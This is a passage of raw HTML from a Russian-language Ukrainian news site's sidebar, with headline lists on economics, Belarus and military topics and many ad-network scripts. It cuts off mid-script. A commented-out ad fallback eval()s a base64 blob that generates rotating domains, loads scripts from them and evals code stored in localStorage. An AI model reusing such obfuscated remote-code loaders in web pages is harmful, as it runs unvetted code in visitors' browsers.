onmouseout="this.className='post'" id="post-4815532"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2208-chem-lira-v-mire-otzovetsya-obostrit-li-defolt-turcii-globalnyj-koronakrizis">Чем лира в мире отзовется: Обострит ли дефолт Турции глобальный коронакризис?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4815398"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2008-andrej-piontkovskij-scenarij-putina-i-lukashenko-po-anshlyuzu-i-transferu-vlasti-v-belarusi-provalitsya">Андрей Пионтковский: Сценарий Путина и Лукашенко по аншлюсу и трансферу власти в Беларуси провалится</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4814801"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1208-anatomiya-belorusskoj-isterii">Протесты в Беларуси: Анатомия белорусской истерии</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><br /><div id='div-gpt-ad-1594991505318-0' style='width: 100%; height: 376px;'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594991505318-0'); });</script></div><br /><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /><div id="CVffjQ1zLagKNzI7JZ53" data-type="2" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/2Zl.js" ></script><br /> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/109-v-borispole-devushka-reshila-progulyatsya-po-krylu-samoleta-video"><img width="142" height="88" alt="В Борисполе девушка решила прогуляться по крылу самолета" src="https://enovosty.com/wp-content/uploads/2020/09/krylo.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/109-v-borispole-devushka-reshila-progulyatsya-po-krylu-samoleta-video">В Борисполе девушка решила прогуляться по крылу самолета</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/409-pojdem-na-rabotu-i-umrem-ukrainskaya-pervoklassnica-na-linejke-stala-zvezdoj-seti-video"><img width="142" height="88" alt="Пойдем на работу и умрем: Украинская первоклассница на линейке стала звездой Сети" src="https://enovosty.com/wp-content/uploads/2020/09/04085045_creenshot_2_large.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/409-pojdem-na-rabotu-i-umrem-ukrainskaya-pervoklassnica-na-linejke-stala-zvezdoj-seti-video">Пойдем на работу и умрем: Украинская первоклассница на линейке стала звездой Сети</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_society/full/109-kurjoz-francuzskij-buldog-smeshno-kopiruet-svoego-xozyaina-video"><img width="142" height="88" alt="Курьез: французский бульдог ест арбуз и смешно копирует своего хозяина" src="https://enovosty.com/wp-content/uploads/2020/08/1fb_1645473837565.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/109-kurjoz-francuzskij-buldog-smeshno-kopiruet-svoego-xozyaina-video">Курьез: французский бульдог ест арбуз и смешно копирует своего хозяина</a></div></td></tr><tr><td class="view"><span><i></i>10212</span></td><td class="view"><span><i></i>9035</span></td><td class="view last"><span><i></i>5509</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-culture/full/3108-ukrainskix-voditelej-nachali-ostanavlivat-patrulnye-po-neozhidannoj-prichine"><img width="142" height="88" alt="Украинских водителей начали останавливать патрульные по неожиданной причине" src="https://enovosty.com/wp-content/uploads/2020/08/vodam.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/3108-ukrainskix-voditelej-nachali-ostanavlivat-patrulnye-po-neozhidannoj-prichine">Украинских водителей начали останавливать патрульные по неожиданной причине</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/209-v-seti-poyavilos-video-zhestkogo-zaderzhaniya-liceistov-bgu-kotorye-protestovali-protiv-lukashenko-foto"><img width="142" height="88" alt="Беларусь не сдается: В сети появилось видео жесткого задержания студентов, которые протестовали против Лукашенко" src="https://enovosty.com/wp-content/uploads/2020/09/main.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/209-v-seti-poyavilos-video-zhestkogo-zaderzhaniya-liceistov-bgu-kotorye-protestovali-protiv-lukashenko-foto">Беларусь не сдается: В сети появилось видео жесткого задержания студентов, которые протестовали против Лукашенко</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_politics/full/109-sensacionnoe-priznanie-byvshego-ministra-dnr-ldnr-sushhestvuyut-tolko-blagodarya-kremlyu-video"><img width="142" height="88" alt="Сенсационное признание бывшего министра ДНР: ЛДНР существуют только благодаря Кремлю" src="https://enovosty.com/wp-content/uploads/2020/09/donn1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/109-sensacionnoe-priznanie-byvshego-ministra-dnr-ldnr-sushhestvuyut-tolko-blagodarya-kremlyu-video">Сенсационное признание бывшего министра ДНР: ЛДНР существуют только благодаря Кремлю</a></div></td></tr><tr><td class="view"><span><i></i>1797</span></td><td class="view"><span><i></i>1548</span></td><td class="view last"><span><i></i>1340</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1206-obval-rynka-v-ssha-rezko-proseli-rynochnye-indeksy-iz-za-ozhidaemoj-vtoroj-volny-koronavirusa" rel="bookmark">Обвал рынка: В США резко просели рыночные индексы из-за ожидаемой второй волны коронавируса</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2603-banki-uoll-strit-rasskazali-chto-budet-s-dollarom" rel="bookmark">Банки Уолл-стрит рассказали, что будет с долларом</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1003-za-odnu-minutu-v-rossii-rekordno-obvalilsya-rynok-akcij" rel="bookmark">За одну минуту: В России рекордно обвалился рынок акций</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news-auto/full/901-stoimost-akcij-tesla-prevysila-obshhuyu-kapitalizaciyu-general-motors-i-ford-vmeste-vzyatyx" rel="bookmark">Стоимость акций Tesla превысила общую капитализацию General Motors и Ford вместе взятых</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/201-associated-press-mirovye-fondovye-indeksy-demonstriruyut-stremitelnyj-rost" rel="bookmark">Associated Press: Мировые фондовые индексы демонстрируют стремительный рост</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1712-stychki-vozle-rady-stalo-izvestno-o-postradavshix" rel="bookmark">Стычки возле Рады. Стало известно о пострадавших</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news-markets/full/2811-stoimost-mirovyx-akcij-upala-posle-zayavleniya-trampa" rel="bookmark">Стоимость мировых акций упала после заявления Трампа</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1202-sinyaya-shapka-ili-amazon-s-ukraincami-podelilis-formuloj-bogatstva" rel="bookmark">Синяя шапка или Amazon: С украинцами поделились формулой богатства</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости экономики</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4249,30426', 4249, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4249,30426', 4249, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4249,30426', 4249, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_economy/full/209-pri-oplate-za-teploenergiyu-neobxodimo-budet-sdelat-chetyre-platezha-kgga">При оплате за теплоэнергию необходимо будет сделать четыре платежа, - КГГА (6068)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/3108-v-ukraine-podorozhal-kartofel-i-pomidory-chto-proisxodit-na-rynke">В Украине подорожал картофель и помидоры. Что происходит на рынке (1828)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/209-merkel-sdelala-gromkoe-zayavlenie-o-sudbe-severnogo-potoka-2-i-sankciyax">Меркель сделала громкое заявление о судьбе "Северного потока-2" и санкциях (1525)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2808-ceny-na-gaz-v-evrope-stremitelno-rastut-chego-zhdat-ukraincam">Цены на газ в Европе стремительно растут: чего ждать украинцам (980)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/209-nacbank-vyvodit-iz-oborota-eshhe-odnu-monetu-kak-eto-povliyaet-na-inflyaciyu">Нацбанк выводит из оборота еще одну монету. Как это повлияет на инфляцию? (909)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/3108-severnyj-potok-2-gazprom-podal-v-sud-na-polshu">"Северный поток-2": Газпром подал в суд на Польшу (904)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/209-sbu-propustilo-v-ukrainu-zapreshhennyj-gruz-iz-sirii-rassledovanie">СБУ пропустило в Украину запрещенный груз из Сирии - расследование (899)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/309-privlech-russkix-k-otvetstvennosti-v-ssha-trebuyut-ostanovit-severnyj-potok-2">"Привлечь русских к ответственности": В США требуют остановить "Северный поток-2" (647)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2808-komu-v-ukraine-stoit-zhdat-povysheniya-pensii-s-sentyabrya">Кому в Украине стоит ждать повышения пенсии с сентября (549)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/109-podorozhanie-gaza-novye-pravila-dlya-bankov-i-facebook-obnovlennyj-kak-menyaetsya-zhizn-ukraincev-s-1-sentyabrya">Подорожание газа, новые правила для банков и Facebook обновленный: Как меняется жизнь украинцев с 1 сентября (474)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4363296"><a href="https://enovosty.com/armiya/full/284-bespilotnyj-letatelnyj-apparat-a-5-orlan" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/06/orlan-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/06/orlan-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/06/orlan-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/orlan.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/284-bespilotnyj-letatelnyj-apparat-a-5-orlan" >Беспилотный летательный аппарат А-5 «Орлан»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4390276"><a href="https://enovosty.com/armiya/full/884-bronirovannyj-vezdehod-bvs10-viking-velikobritaniya-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/BvS10_Viking-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/BvS10_Viking-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/BvS10_Viking-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/BvS10_Viking.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/884-bronirovannyj-vezdehod-bvs10-viking-velikobritaniya-shveciya" >Бронированный вездеход BvS10 Viking (Великобритания-Швеция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4455020"><a href="https://enovosty.com/armiya/full/565-zenitno-raketnyj-kompleks-chu-sam-type-03-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/06/Type03_SAM-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/06/Type03_SAM-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/06/Type03_SAM-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/06/Type03_SAM.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/565-zenitno-raketnyj-kompleks-chu-sam-type-03-yaponiya" >Зенитно-ракетный комплекс Chu-SAM Type-03 (Япония)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4463068"><a href="https://enovosty.com/armiya/full/557-boevaya-mashina-pehoty-kifv-xk-21-yuzhnaya-koreya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/08/kx21-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/08/kx21-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/08/kx21-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/08/kx21.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/557-boevaya-mashina-pehoty-kifv-xk-21-yuzhnaya-koreya" >Боевая машина пехоты KIFV XK-21 (Южная Корея)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4323495"><a href="https://enovosty.com/person/full/bahmatyuk-oleg" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/11/bahmatyuk_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/11/bahmatyuk_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/11/bahmatyuk_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/bahmatyuk-oleg" >Бахматюк<br /> Олег</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4328836"><a href="https://enovosty.com/person/full/222-firtash-dmitrij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/12/firtash_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/12/firtash_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/12/firtash_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/222-firtash-dmitrij" >Фирташ<br /> Дмитрий</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4474085"><a href="https://enovosty.com/person/full/373-bereza-borislav" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/10/bereza-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/10/bereza-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/10/bereza.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/373-bereza-borislav" >Береза<br /> Борислав</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4653962"><a href="https://enovosty.com/person/full/1211-yuzhanina-nina" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2017/11/yuzhanina-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2017/11/yuzhanina-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2017/11/yuzhanina.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/1211-yuzhanina-nina" >Южанина<br /> Нина</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/409-pojdem-na-rabotu-i-umrem-ukrainskaya-pervoklassnica-na-linejke-stala-zvezdoj-seti-video">"Пойдем на работу и умрем": Украинская первоклассница на линейке стала звездой Сети (ВИДЕО) (9004)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/409-novye-sankcii-zastavyat-rossiyan-zhit-za-dollar-v-den-voennyj-ekspert">Новые санкции заставят россиян жить за доллар в день, - военный эксперт (3187)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/309-nazvany-usloviya-torga-lukashenko-s-rossiej-budet-li-legitimnym-soyuznoe-gosudarstvo">Названы условия торга Лукашенко с Россией: будет ли легитимным "Союзное государство" (2830)</a></p><p class="press"><a href="https://enovosty.com/uk/news_abroad-ukr/full/309-kurjoz-polski-fermeri-zbirayut-vrozhaj-pshenici-pryamo-sered-novix-bagatopoverxivok-video">Курйоз: Польські фермери збирають врожай пшениці прямо серед нових багатоповерхівок (ВІДЕО) (2288)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/309-uchenye-obnaruzhili-rzhavchinu-na-lune">Ученые обнаружили таинственную ржавчину на Луне (2224)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/309-nemnogo-opozdalo-francuzhenke-prishlo-pismo-kotoroe-otpravili-138-let-nazad-ee-prapradedu">"Немного опоздало": француженке пришло письмо, которое отправили 138 лет назад ее прапрадеду (1897)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/409-ukraincy-oblyubovali-yaponskie-b-u-avto">В Украине появились необычные б/у авто из Японии (1546)</a></p><p class="press"><a href="https://enovosty.com/uk/news_abroad-ukr/full/409-chornij-chetver-na-fondovomu-rinku-ssha-bagatii-vstratili-milyardi-dollariv">"Чорний четвер" на фондовому ринку США: багатії втратили мільярди (1486)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/409-rossijskij-klon-ukrainskogo-neptuna-okazalsya-syrym-i-nedodelannym-zloj-odessit">Российский клон украинского "Нептуна" оказался сырым и недоделанным, - "Злой одессит" (1051)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/409-rossiya-ustroila-provokacii-nato-nad-barencevym-morem">Россия устроила провокации НАТО над Баренцевым морем (1018)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2608-iz-za-nalogovogo-sxematoza-sluga-naroda-riskuet-proigrat-vybory-v-xarkovskoj-oblasti">Из-за налогового схематоза “Слуга народа” рискует проиграть выборы в Харьковской области</a></p><p class="press"><a href="https://enovosty.com/publications/full/1008-starye-vagony-poezda-pod-otkos">Старые вагоны – поезда под откос</a></p><p class="press"><a href="https://enovosty.com/publications/full/708-ukrzaliznycya-ostalas-bez-koles">«Укрзализныця» осталась без колес</a></p></div><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div></br><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/1308-ostanovite-nasilie-zhyve-belarus"><img alt="Остановите насилие. Жыве Беларусь!" src="https://enovosty.com/wp-content/uploads/2020/08/oleg_savchenko_lsp_2020_4-112x89.jpg"><div>Олег Савченко</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/1308-ostanovite-nasilie-zhyve-belarus">Остановите насилие. Жыве Беларусь!</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/1308-ostanovite-nasilie-zhyve-belarus">Кумир белорусской молодежи, рэп-исполнитель и лидер группы «ЛСП» Олег Савченко эмоциально высказался о протестах в Беларуси и призвал остановить насилие. ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/3008-sinoptiki-rasskazali-stoit-li-zhdat-v-ukraine-babego-leta">Синоптики рассказали, стоит ли ждать в Украине "бабьего лета" (16130)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/109-v-borispole-devushka-reshila-progulyatsya-po-krylu-samoleta-video">В Борисполе девушка решила прогуляться по крылу самолета (ВИДЕО) (10211)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/409-pojdem-na-rabotu-i-umrem-ukrainskaya-pervoklassnica-na-linejke-stala-zvezdoj-seti-video">"Пойдем на работу и умрем": Украинская первоклассница на линейке стала звездой Сети (ВИДЕО) (9004)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
